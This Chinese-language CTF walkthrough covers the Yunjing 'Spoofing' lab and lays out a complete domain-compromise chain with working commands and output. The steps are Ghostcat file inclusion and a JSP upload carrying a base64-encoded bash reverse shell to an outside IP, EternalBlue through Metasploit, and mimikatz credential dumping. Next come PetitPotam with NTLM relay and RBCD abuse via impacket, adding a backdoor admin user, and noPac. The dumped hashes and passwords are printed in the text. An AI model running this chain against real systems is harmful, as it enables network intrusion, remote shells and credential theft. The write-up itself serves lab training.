参考文章
https://fushuling.com/index.php/2023/10/14/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7spoofing/
https://blog.csdn.net/uuzeray/article/details/142993560
https://blog.csdn.net/m0_62466350/article/details/135874733入口机
39.98.119.134
fscan扫
PS G:\tool\护网\工具打包> G:\tool\护网\工具打包\fscan322.exe -h 39.98.119.134
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
39.98.119.134:8080 open
39.98.119.134:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.98.119.134:8080 code:200 len:7091 title:后台管理是一个后台管理,dirsearch扫一下
看了一下是Tomcat 9.0.30,有CVE-2020-1983 Tomcat文件包含漏洞
https://github.com/00theway/Ghostcat-CNVD-2020-10487
PS G:\春秋\Spoofing> python .\ajpShooter.py http://39.98.119.134:8080/ 8009 /WEB-INF/web.xml read
_ _ __ _ _
/_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __
//_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
/ _ \| | |_) | _\ \ | | | (_) | (_) | || __/ |
\_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_|
|__/|_|
00theway,just for test
[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"2489-1670857638305"
[<] Last-Modified: Mon, 12 Dec 2022 15:07:18 GMT
[<] Content-Type: application/xml
[<] Content-Length: 2489
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
<display-name>Archetype Created Web Application</display-name>
<security-constraint>
<display-name>Tomcat Server Configuration Security Constraint</display-name>
<web-resource-collection>
<web-resource-name>Protected Area</web-resource-name>
<url-pattern>/upload/*</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>admin</role-name>
</auth-constraint>
</security-constraint>
<error-page>
<error-code>404</error-code>
<location>/404.html</location>
</error-page>
<error-page>
<error-code>403</error-code>
<location>/error.html</location>
</error-page>
<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/error.html</location>
</error-page>
<servlet>
<servlet-name>HelloServlet</servlet-name>
<servlet-class>com.example.HelloServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>HelloServlet</servlet-name>
<url-pattern>/HelloServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>LoginServlet</display-name>
<servlet-name>LoginServlet</servlet-name>
<servlet-class>com.example.LoginServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginServlet</servlet-name>
<url-pattern>/LoginServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>RegisterServlet</display-name>
<servlet-name>RegisterServlet</servlet-name>
<servlet-class>com.example.RegisterServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>RegisterServlet</servlet-name>
<url-pattern>/RegisterServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>UploadTestServlet</display-name>
<servlet-name>UploadTestServlet</servlet-name>
<servlet-class>com.example.UploadTestServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>UploadTestServlet</servlet-name>
<url-pattern>/UploadServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>DownloadFileServlet</display-name>
<servlet-name>DownloadFileServlet</servlet-name>
<servlet-class>com.example.DownloadFileServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadFileServlet</servlet-name>
<url-pattern>/DownloadServlet</url-pattern>
</servlet-mapping>
</web-app>
PS G:\春秋\Spoofing>看到有一个UploadServlet功能能上传文件,所以可以包含文件rce
http://39.98.119.134:8080/UploadServlet
上传恶意文件
<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTUuMTMwLjI2LzEzMzcgMD4mMQ==}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%>
Files are stored in ./upload/4ee679481a4eafcf4735a31aa4924162/20251102022547643.txtpython .\ajpShooter.py http://39.98.119.134:8080/ 8009 /upload/4ee679481a4eafcf4735a31aa4924162/20251102022547643.txt eval
直接是root,方便起见,vshell控一下
flag01
flag01: flag{d25a076f-a861-48e1-b2fb-af0835532413}还是老三样传fscan扫内网,搭隧道
root@ubuntu:/tmp# ./fscan -h 172.22.11.1/24 -o 1.txt
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.11.6 is alive
(icmp) Target 172.22.11.76 is alive
(icmp) Target 172.22.11.26 is alive
(icmp) Target 172.22.11.45 is alive
[*] Icmp alive hosts len is: 4
172.22.11.76:22 open
172.22.11.76:8080 open
172.22.11.45:445 open
172.22.11.26:445 open
172.22.11.6:445 open
172.22.11.26:139 open
172.22.11.45:139 open
172.22.11.6:139 open
172.22.11.45:135 open
172.22.11.26:135 open
172.22.11.6:135 open
172.22.11.6:88 open
172.22.11.76:8009 open
[*] alive ports len is: 13
start vulscan
[*] NetBios 172.22.11.26 XIAORANG\XR-LCM3AE8B
[*] NetBios 172.22.11.6 [+] DC:XIAORANG\XIAORANG-DC
[*] NetInfo
[*]172.22.11.26
[->]XR-LCM3AE8B
[->]172.22.11.26
[*] NetInfo
[*]172.22.11.6
[->]XIAORANG-DC
[->]172.22.11.6
[+] MS17-010 172.22.11.45 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle http://172.22.11.76:8080 code:200 len:7091 title:后台管理
[*] NetBios 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
已完成 13/13
[*] 扫描结束,耗时: 7.695997805s
root@ubuntu:/tmp# 172.22.11.6 XIAORANG-DC
172.22.11.76 本机
172.22.11.26 XR-LCM3AE8B
172.22.11.45 XR-DESKTOP.xiaorang.lab MS17-010
永恒之蓝
[+] MS17-010 172.22.11.45 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload payload/windows/x64/meterpreter/bind_tcp
set rhosts 172.22.11.45
run
cat C:/users/administrator/flag/flag02.txt
flag02
flag02: flag{487042e1-e5f6-4880-a6f1-1efed4972e07}无ADCS + Petitpotam + ntlm中继
抓到机器账户和yangmei的哈希
load kiwi
creds_all
Username Domain NTLM SHA1
-------- ------ ---- ----
XR-DESKTOP$ XIAORANG bae4bc764ee3fde96f12bb2fbe c6434b7f1ba66c20b28d6d43103
6334fe ea1f2da191128
yangmei XIAORANG 25e42ef4cc0ab6a8ff9e3edbbd 6b2838f81b57faed5d860adaf94
a91841 01b0edb269a6f
yangmei XIAORANG xrihGHgoNZQ
看大佬的分析
使用Bloodhound收集到的用户名组合获取到的密码/hashes组合爆破,没发现其他新用户
MAQ = 0,加不了计算机
当前LDAP 没 TLS,远程也加不了计算机,impacket的addcomputer有两种方法samr和ldaps。samr受到MAQ = 0的限制,无法添加计算机;ldaps受到 没TLS + MAQ = 0 的限制
域控存在nopac,当前用户yangmei使用nopac没打死,并且对域内computer container没有createchild的ACL
域控存在nopac,当前用户yangmei对当前windows机器xr-desktop没WriteDacl权限,意味着无法修改SamAccountName
域内存在 DFscoerce 和 petitpotam,但是不存在CVE-2019-1040,因此放弃 DFscoerce,优先使用petitpotam
NoPac exploit: Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)
推荐使用petitpotam,所以我们使用crackmapexec进行信息收集,这里的-M参数可以指定相关的漏洞。
proxychains4 crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -d xiaorang.lab -M Webdav 2>/dev/null
无ADCS + Petitpotam + ntlm中继打法
攻击链:用petitpotam触发存在漏洞且开启了webclient服务的目标,利用petitpotam触发目标访问我们的http中继服务,目标将会使用webclient携带ntlm认证访问我们的中继,并且将其认证中继到ldap,获取到机器账户的身份,以机器账户的身份修改其自身的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性,允许我们的恶意机器账户模拟以及认证访问到目标机器 (RBCD)
如果WebClient在目标机器上开启,那么攻击者可以使用强制技术(例如PetitPotam、PrinterBug)来滥用 WebClient 服务,从而强制进行身份验证,后续通过设置基于资源的约束委派等方式来获取目标机器的最高权限。关于weblcient relay的原理参考:Privilege Escalation – NTLM Relay over HTTP (Webdav),文章的作者也是云境的靶场设计者。
满足条件,目标机器需要开启webclient服务。
我们这里使用webclientservicescanner来进行探测目标机器是否开启webclient服务,可以看到只有172.22.11.26开启了,也就是说目前只能拿下172.22.11.26。
proxychains webclientservicescanner xiaorang.lab/yangmei:xrihGHgoNZQ@172.22.11.6 -no-validation
proxychains webclientservicescanner xiaorang.lab/yangmei:xrihGHgoNZQ@172.22.11.26 -no-validation入口机运行(vshell上线的)
socat tcp-listen:80,reuseaddr,fork tcp:47.115.130.26:8848在vps上运行
./frps -c ./frps.ini
[common]
bind_port = 7099
[tcp_1200]
type = tcp
local_ip = 127.0.0.1
local_port = 8848在本地kali上运行
./frpc -c ./frpc.ini
[common]
server_addr = vpsip
server_port = 7099
[plugin_socks6]
type = tcp
remote_port = 8848
local_port = 80
local_ip = 127.0.0.1curl一下,发现确实被本地kali接收到
开启ntlmrelayx,利用前面拿下的XR-Desktop作为恶意机器账户设置RBCD,接着使用Petitpotam触发XR-LCM3AE8B认证到172.22.11.76
proxychains4 impacket-ntlmrelayx -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-accessproxychains python PetitPotam.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab ubuntu@80/webdav 172.22.11.26
用之前172.22.11.45上抓的机器账户XR-DESKTOP$哈希打172.22.11.26的RBCD,申请ST票据
proxychains4 impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :bae4bc764ee3fde96f12bb2fbe6334fe xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6
这边重命名一下,导入票据
export KRB5CCNAME=administrator.ccache把172.22.11.26 XIAORANG\XR-LCM3AE8B加到/etc/hosts里后psexec无密码连接
proxychains python psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk
flag03
type C:\users\administrator\flag\flag03.txt
flag03: flag{4dee7605-5c85-4251-8cd5-4c9d5863ce97}noPac
发现存在MA_Admin组,可以添加账户
net group /domain
net group "MA_Admin" /domain
新建一个账户rdp连
net user zzdzz qwer1234@ /add
net localgroup administrators zzdzz /add上传猕猴桃
privilege::debug
sekurlsa::logonpasswords
1232126b24cdf8c9bd2f788a9d7c7ed1他在MA_Admin组,对computer能够创建对象,能向域中添加机器账户,所以能打noPac
proxychains python noPac.py xiaorang.lab/zhanghui -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shelltype C:\users\administrator\flag\flag04.txt
flag04
flag04: flag{4cbea0c8-0328-4192-92e2-afb60a969fc4}
评论(已关闭)
评论已关闭